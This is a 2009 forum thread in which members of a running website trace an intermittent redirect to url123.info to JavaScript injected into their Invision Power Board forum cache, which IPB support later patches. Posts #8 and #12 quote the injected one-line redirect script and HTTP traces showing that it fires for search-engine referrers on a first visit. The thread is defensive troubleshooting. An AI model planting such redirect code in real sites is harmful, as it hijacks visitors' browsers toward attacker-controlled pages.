Jump to content


Url123.info ?


  • You cannot reply to this topic
40 replies to this topic

#1 WhiffyFuzzball

    CoolRunner

  • Forum Member
  • PipPip
  • 68 posts
  • Joined: 21-May 07
  • Sex:Male
  • Location:sydney

Posted 22 October 2009 - 08:51 AM

Hi,

About 50% of the time when I click on a link to a CR post in my RSS reader (Google Reader) I get sent to http://url123.info/be82c0f0. If I click it again, it works correctly.

Any idea what's happening? It's really annoying.


Thanks,

Paul

Support our Australian advertisers:

#2 chilliman

    Hot eater, Cool Trail Runner.

  • Moderator
  • PipPipPipPipPip
  • 5,227 posts
  • Joined: 25-October 02
  • Sex:Male
  • Location:On a muddy Trail

Posted 22 October 2009 - 09:36 AM

I sent an email to the help desk the other week on this, I mainly notice it when opening new tabs from search results. (centre button clicking).

Yep it is particularly annoying when you then open that tab and all you have is the URL123 message and have closed the original you linked from. Maybe some sort of timing issue, and from the description on the site it says something about making long URL's shorter. I'm guessing it is something going on at the back end with lookups for long path names to resources. But why it has just started to happen recently I don't know. I was told it was being looked into, but will be interesting to see how many others are experiencing the issue. As you said it always works the second time, so that's what's making me believe it is a timing issue of some description.

Myself using Firefox on MacOSX.

#3 chrisso

    veryCoolRunner

  • Forum Member
  • PipPipPip
  • 940 posts
  • Joined: 27-February 09
  • Sex:Male
  • Location:Brisbane

Posted 22 October 2009 - 09:53 AM

I think its something to do with the way the server is configured... without going into the full detail

Most likely to do with certain HTTP_REFERER being redirected

The server administrators probably need to check any .htaccess files for a rewrite that sends certain HTTP_REFERER to the url123.info address

#4 Bellthorpe

    草分け

  • Administrator
  • PipPipPipPipPip
  • 6,315 posts
  • Joined: 23-October 04
  • Sex:Male
  • Location:Paris

Posted 22 October 2009 - 10:30 AM

Were that the case, Chrisso, wouldn't you think it would be repeatable? As far as I can determine, it's not.

I'm reasonably sure, without being able to prove it, that it's a server overload condition.

#5 chrisso

    veryCoolRunner

  • Forum Member
  • PipPipPip
  • 940 posts
  • Joined: 27-February 09
  • Sex:Male
  • Location:Brisbane

Posted 22 October 2009 - 11:21 AM

View PostBellthorpe, on Oct 22 2009, 10:30 AM, said:

Were that the case, Chrisso, wouldn't you think it would be repeatable? As far as I can determine, it's not.

I'm reasonably sure, without being able to prove it, that it's a server overload condition.


I can repeat it easily... please try clicking on this link to google

http://www.google.co.....ing Programs"

which should display 1 result in google

click on the cool running link and see if you get redirected

Note this will only work once for each referring address unless you open a completely new browser session or use 'in private' browsing modes... in which case it will happen everytime.

#6 chilliman

    Hot eater, Cool Trail Runner.

  • Moderator
  • PipPipPipPipPip
  • 5,227 posts
  • Joined: 25-October 02
  • Sex:Male
  • Location:On a muddy Trail

Posted 22 October 2009 - 12:37 PM

View Postchrisso, on Oct 22 2009, 11:21 AM, said:

click on the cool running link and see if you get redirected

Nope, all worked ok 1st time.

Edit: Ok with private browsing enabled then yes, the redirect showed up.

The home page http://url123.info/ almost looks like a useful service, allowing you to enter & create aliases of longer URL's.
Not sure what else is going on behind the scenes there though.

Edited by chilliman, 22 October 2009 - 09:11 PM.


#7 Jogger

    CoolRunner

  • Administrator
  • PipPipPipPipPip
  • 8,410 posts
  • Joined: 01-August 01
  • Sex:Male
  • Location:Sydney

Posted 22 October 2009 - 03:14 PM

I got the url123 from the google link returned by chrisso's.
I also got the same issue on a link in transitions the other day so its not purely CR.
CR uses the same forum software as transitions.

I have not looked at it too closely but get it at work, not at home.

Any additional info posted here will be of great use in our detective work.

#8 chrisso

    veryCoolRunner

  • Forum Member
  • PipPipPip
  • 940 posts
  • Joined: 27-February 09
  • Sex:Male
  • Location:Brisbane

Posted 22 October 2009 - 03:52 PM

Note im using private browser mode with firefox to ensure i look like im visiting the page for the first time each time i do this

I disabled javascript and repeated the process i outlined above

This displayed a 'blank' page

When i view the source code of the page this is what it contains:

<html><body><script type="text/javascript">document.location='http://url123.info/b...></body></html>

I searched google for "document.location='http://url123.info" and found a link to a russian website for invision power board

here's a link to a google translation of the page where it seems like they are talking about a vulnerabilty in the software

http://translate.goo.....lz=1I7GGLL_en

i will keep digging around

#9 chrisso

    veryCoolRunner

  • Forum Member
  • PipPipPip
  • 940 posts
  • Joined: 27-February 09
  • Sex:Male
  • Location:Brisbane

Posted 22 October 2009 - 04:26 PM

my only other thoughts on this are that the hackers want you to think its a random intermittent issue, there by hoping you won't do anything about it... and secondly it looks like url123.info has disabled the short cut as they knew it was being used by hackers to deliver a payload

Edited by chrisso, 22 October 2009 - 04:26 PM.


#10 Bellthorpe

    草分け

  • Administrator
  • PipPipPipPipPip
  • 6,315 posts
  • Joined: 23-October 04
  • Sex:Male
  • Location:Paris

Posted 22 October 2009 - 05:12 PM

My mistake, as you say it's certainly reproducible. I'd tried to reproduce it previously without success, but no in 'private mode'. Just to be sure, I also tried it in Opera and Chrome, as well as (reluctantly) stoking up IE. Equally as reproducible.

I've traced the traffic, as follows. This starts from when I click on the google page.

#request# GET http://www.google.com.au/url?sa=T&source=web&ct=res&cd=1&ved=0CBUQFjAA&url=http%3A%2F%2Fwww.coolrunning.com.au%2Fforums%2Findex.php%3Fshowtopic%3D25267%26view%3Dgetnewpost&ei=-ALgSqD2BaT26gOIsICsCw
#request# GET http://www.coolrunning.com.au/forums/index.php?showtopic=25267&view=getnewpost
GET /forums/index.php?showtopic=25267&view=getnewpost
#request# GET http://url123.info/be82c0f0
GET /be82c0f0
#request# GET http://url123.info/axe.css

If nothing else, it clears Google. The first GET is to CoolRunning, and in response to that it's doing a GET to url123.info.

I've not been able to trap any bad JavaScript. I'll keep poking around.

Kevin, can you check date stamps on your JavaScript files on the server ... see if any of them have been tampered with?

BTW, a site of mine was hacked, with a PHP payload that installed thousands of Viagra etc. pages. I didn't see it until my traffic started going down, as Google penalised the site for the huge number of inbound poor quality links that the hackers also installed on other sites. Tens of thousands of them. The Google mechanism for fixing this (after removing the bad pages, but putting them in robots.txt) was pretty good, and efficient.

So twice a day now I have a cron run a small job to email me if there are any new PHP or directories on the server. That could quite as easily be done to look for changed JavaScript files.

#11 Whippet gal

    veryCoolRunner

  • Forum Member
  • PipPipPip
  • 682 posts
  • Joined: 25-June 06
  • Sex:Female
  • Location:Blue Mountains NSW

Posted 23 October 2009 - 04:40 PM

I thought this was just an issue for me, until I realised it's happening on both my Macs and my PC and at work and home.

I have nothing to add in terms of a solution, but I'm hoping someone else can tell me how to stop it.

#12 WhiffyFuzzball

    CoolRunner

  • Forum Member
  • PipPip
  • 68 posts
  • Joined: 21-May 07
  • Sex:Male
  • Location:sydney

Posted 26 October 2009 - 09:14 AM

OK, I have traced the traffic from the Google hit listed above and it does look like a error/hack in CR's forum software.
From clicking on the Google link the traffic looks like this (from Fiddler, www.fiddlertool.com):

Request:
GET /forums/index.php?showtopic=25267&view=getnewpost HTTP/1.1
Host: www.coolrunning.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.google.co.....ing Programs"

Response:
HTTP/1.0 200 OK
Date: Sun, 25 Oct 2009 23:04:12 GMT
Server: Apache
Vary: Host
Set-Cookie: ipb2=1; expires=Mon, 26-Oct-2009 23:04:12 GMT
Content-Length: 113
Content-Type: text/html
X-Cache: MISS from <myproxy>
Via: 1.0 <myproxy>:8080 (squid/2.6.STABLE6)
Proxy-Connection: keep-alive

Response Content:
<html><body><script type="text/javascript">document.location='http://url123.info/b...></body></html>

From there is loads the page that you see. A cookie is set so this link is not loaded every time.

Any chance the site admins could check to see if the board has been compromised?


Paul

#13 WhiffyFuzzball

    CoolRunner

  • Forum Member
  • PipPip
  • 68 posts
  • Joined: 21-May 07
  • Sex:Male
  • Location:sydney

Posted 26 October 2009 - 09:22 AM

There's a link here that looks relevant but I don't have access to view it - http://74.125.153.13...I...=clnk&gl=au

#14 WhiffyFuzzball

    CoolRunner

  • Forum Member
  • PipPip
  • 68 posts
  • Joined: 21-May 07
  • Sex:Male
  • Location:sydney

Posted 26 October 2009 - 09:34 AM

Also the russian link that Chrisso found says rebuilding the invision cache clears the problem.

#15 Jogger

    CoolRunner

  • Administrator
  • PipPipPipPipPip
  • 8,410 posts
  • Joined: 01-August 01
  • Sex:Male
  • Location:Sydney

Posted 26 October 2009 - 10:36 AM

I did reset the cache at the end of last week - not sure it helped though.

#16 chrisso

    veryCoolRunner

  • Forum Member
  • PipPipPip
  • 940 posts
  • Joined: 27-February 09
  • Sex:Male
  • Location:Brisbane

Posted 28 October 2009 - 10:53 AM

just checked some stats at alexa.com ( http://www.alexa.com...lrunning.com.au  then click on the Clickstream tab )

looks like this url123.info is stuffing a lot of people up


Upstream Sites
Percent of total visits to coolrunning.com.au preceded by a visit to the upstream site.

48.98% google.com.au
34.69% google.com
8.16% google.co.uk
8.16% url123.info

Downstream Sites
Percent of total visits to coolrunning.com.au followed by a visit to the downstream site.

46.81% url123.info
21.28% google.com
19.15% google.com.au
6.38% megaclick.com

#17 chilliman

    Hot eater, Cool Trail Runner.

  • Moderator
  • PipPipPipPipPip
  • 5,227 posts
  • Joined: 25-October 02
  • Sex:Male
  • Location:On a muddy Trail

Posted 28 October 2009 - 11:38 AM

And how many Hungarian CR's do we actually have ?

Posted Image

#18 DiJ

    veryCoolRunner

  • Forum Member
  • PipPipPip
  • 311 posts
  • Joined: 02-September 03
  • Sex:Female
  • Location:Bentleigh East, Victoria

Posted 29 October 2009 - 11:29 AM

I keep getting the url123 also both at home and at work and its maddening because it closes down Coolrunning and then I have to go right back to the start again.  Happens with all sorts of searches.  Grrrr

#19 chilliman

    Hot eater, Cool Trail Runner.

  • Moderator
  • PipPipPipPipPip
  • 5,227 posts
  • Joined: 25-October 02
  • Sex:Male
  • Location:On a muddy Trail

Posted 20 November 2009 - 09:50 PM

It looks like nothing much has progressed with this ?
I am guessing it probably accounts for a higher incidence of repeat of past threads as users hit the error and give up with the search engine, such as in recent cases here and here.

If it can't be fixed in the short term can we at least insert a warning message onto the search engine page ?

Cheers.

#20 Anth

    veryCoolRunner

  • Forum Member
  • PipPipPip
  • 493 posts
  • Joined: 13-January 07
  • Sex:Male
  • Location:London

Posted 21 November 2009 - 01:41 AM

If you need a unix admin/programmer type to look at it, feel free to shout. I see this problem enough that it annoys me, so I'd love to sort it out, if only because I hate persistence.

#21 TynoMite

    veryCoolRunner

  • Forum Member
  • PipPipPip
  • 731 posts
  • Joined: 22-April 08
  • Sex:Male
  • Location:0

Posted 21 November 2009 - 09:13 PM

Yeah, I copped it a few times today after doing a search.
Some "interesting" descriptions on supposed Cool Running results after searching for "nipple"  :good:

#22 sook54

    channelling my inner athlete

  • Forum Member
  • PipPipPipPipPip
  • 2,389 posts
  • Joined: 21-January 07
  • Sex:Female
  • Location:Sydney Inner West

Posted 22 November 2009 - 09:28 PM

View PostAnth, on Nov 21 2009, 02:41 AM, said:

If you need a unix admin/programmer type to look at it, feel free to shout. I see this problem enough that it annoys me, so I'd love to sort it out, if only because I hate persistence.

Anth, can you drop a line to info@coolrunning.com.au - if the problem still hasn't been sorted out I think it should be!

#23 Bellthorpe

    草分け

  • Administrator
  • PipPipPipPipPip
  • 6,315 posts
  • Joined: 23-October 04
  • Sex:Male
  • Location:Paris

Posted 22 November 2009 - 10:01 PM

Indeed it should. I can only assume it's been logged with the hosting provider? Whose response was ... ?

#24 sook54

    channelling my inner athlete

  • Forum Member
  • PipPipPipPipPip
  • 2,389 posts
  • Joined: 21-January 07
  • Sex:Female
  • Location:Sydney Inner West

Posted 23 November 2009 - 06:11 AM

That's Jogger Kev's dept :good:

#25 WhiffyFuzzball

    CoolRunner

  • Forum Member
  • PipPip
  • 68 posts
  • Joined: 21-May 07
  • Sex:Male
  • Location:sydney

Posted 07 December 2009 - 08:18 AM

FYI - this is still happening.


Paul

#26 Digger

    1000-club gold-rated CoolRunner

  • Forum Member
  • PipPipPipPipPip
  • 3,124 posts
  • Joined: 19-July 04
  • Sex:Male
  • Location:Brisbane

Posted 07 December 2009 - 09:58 AM

I get it all of the time when using the search feature.

I just use the back button, the try again, and on the 2nd go, the page I want comes up.

#27 chilliman

    Hot eater, Cool Trail Runner.

  • Moderator
  • PipPipPipPipPip
  • 5,227 posts
  • Joined: 25-October 02
  • Sex:Male
  • Location:On a muddy Trail

Posted 07 December 2009 - 10:40 AM

View PostDigger, on Dec 7 2009, 10:58 AM, said:

I get it all of the time when using the search feature.

I just use the back button, the try again, and on the 2nd go, the page I want comes up.

It really gives me the shits when centre button clicking on multiple search results (to open in new tabs) only to find later each one has the URL123 error. Can't go back on the new tabs or too late to go back and work out which results I clicked on in the search result tab.

I think the main concern is that it is discouraging users from using the search engine, which I believe should be emphasised on the site more anyway.

#28 Vurt

    1.21 Jiggawatts

  • Moderator
  • PipPipPipPipPip
  • 1,118 posts
  • Joined: 23-May 05
  • Sex:Male
  • Location:Sydney

Posted 07 December 2009 - 03:16 PM

interesting

#29 Vurt

    1.21 Jiggawatts

  • Moderator
  • PipPipPipPipPip
  • 1,118 posts
  • Joined: 23-May 05
  • Sex:Male
  • Location:Sydney

Posted 07 December 2009 - 04:51 PM

Looking at this thread : http://forums.odforc...nks-from-feeds/

it would appear to be a hack injecting code into the forum cache. I would assume that it is going to require a forum upgrade to fix it. Just waiting to get a log in to the IPB website to confirm this (hopefully).

#30 Vurt

    1.21 Jiggawatts

  • Moderator
  • PipPipPipPipPip
  • 1,118 posts
  • Joined: 23-May 05
  • Sex:Male
  • Location:Sydney

Posted 07 December 2009 - 05:01 PM

I have raised a ticket with IPB because i am too lazy to search their knowledge base. Being a customer is fun sometimes.

#31 Vurt

    1.21 Jiggawatts

  • Moderator
  • PipPipPipPipPip
  • 1,118 posts
  • Joined: 23-May 05
  • Sex:Male
  • Location:Sydney

Posted 14 December 2009 - 04:07 AM

okay - this should be fixed now. Can you guys please confirm ?

#32 sook54

    channelling my inner athlete

  • Forum Member
  • PipPipPipPipPip
  • 2,389 posts
  • Joined: 21-January 07
  • Sex:Female
  • Location:Sydney Inner West

Posted 14 December 2009 - 05:34 AM

yes! at least with my experiment of 1.

This has been going on since August (when I first noticed it) so hopefully will help make the site more useable again.

Well done Vurt!

#33 chrisso

    veryCoolRunner

  • Forum Member
  • PipPipPip
  • 940 posts
  • Joined: 27-February 09
  • Sex:Male
  • Location:Brisbane

Posted 14 December 2009 - 05:47 AM

Yep looks fixed to me!

#34 Vurt

    1.21 Jiggawatts

  • Moderator
  • PipPipPipPipPip
  • 1,118 posts
  • Joined: 23-May 05
  • Sex:Male
  • Location:Sydney

Posted 14 December 2009 - 06:46 AM

i realigned the flux-capacitor

#35 chilliman

    Hot eater, Cool Trail Runner.

  • Moderator
  • PipPipPipPipPip
  • 5,227 posts
  • Joined: 25-October 02
  • Sex:Male
  • Location:On a muddy Trail

Posted 16 December 2009 - 08:58 PM

View PostVurt, on Dec 14 2009, 07:46 AM, said:

i realigned the flux-capacitor

Thanks Vurt, just noticed before during a few searches that I didn't see the expected URL123 error.
Even searching for this thread didn't send me off into space.

Appreciated very much !

#36 Whippet gal

    veryCoolRunner

  • Forum Member
  • PipPipPip
  • 682 posts
  • Joined: 25-June 06
  • Sex:Female
  • Location:Blue Mountains NSW

Posted 16 December 2009 - 10:03 PM

Thanks Vurt. Love your work.

#37 Vurt

    1.21 Jiggawatts

  • Moderator
  • PipPipPipPipPip
  • 1,118 posts
  • Joined: 23-May 05
  • Sex:Male
  • Location:Sydney

Posted 17 December 2009 - 06:46 AM

it was actually the techs at IPB that fixed it, i was just supervising.

#38 March

    Newbie

  • Newbie
  • Pip
  • 2 posts
  • Joined: 14-January 10

Posted 14 January 2010 - 07:02 PM

Hey Vurt

I'm the admin of the site you linked to above (odforce.net), and oddly enough I found your thread when searching for this problem. I don't suppose you know what IPB did to fix your board do you? I've been trying in vain to fix it but they deny there's even a problem when I ask :good: (the perils of letting support lapse).

Thanks
Marc

#39 sook54

    channelling my inner athlete

  • Forum Member
  • PipPipPipPipPip
  • 2,389 posts
  • Joined: 21-January 07
  • Sex:Female
  • Location:Sydney Inner West

Posted 16 January 2010 - 09:45 AM

Hi Marc
Vurt is away on hols at the moment I think - no doubt he will post when he gets back online.

#40 Vurt

    1.21 Jiggawatts

  • Moderator
  • PipPipPipPipPip
  • 1,118 posts
  • Joined: 23-May 05
  • Sex:Male
  • Location:Sydney

Posted 16 January 2010 - 01:49 PM

Hi Marc,

for the record - IPB support applied a patch to the forums and also cleaned and changed the permissions of a file.

I will email you the specifics.

#41 March

    Newbie

  • Newbie
  • Pip
  • 2 posts
  • Joined: 14-January 10

Posted 16 January 2010 - 05:20 PM

Awesome, thanks for the help Vurt :good:.

Cheers
Marc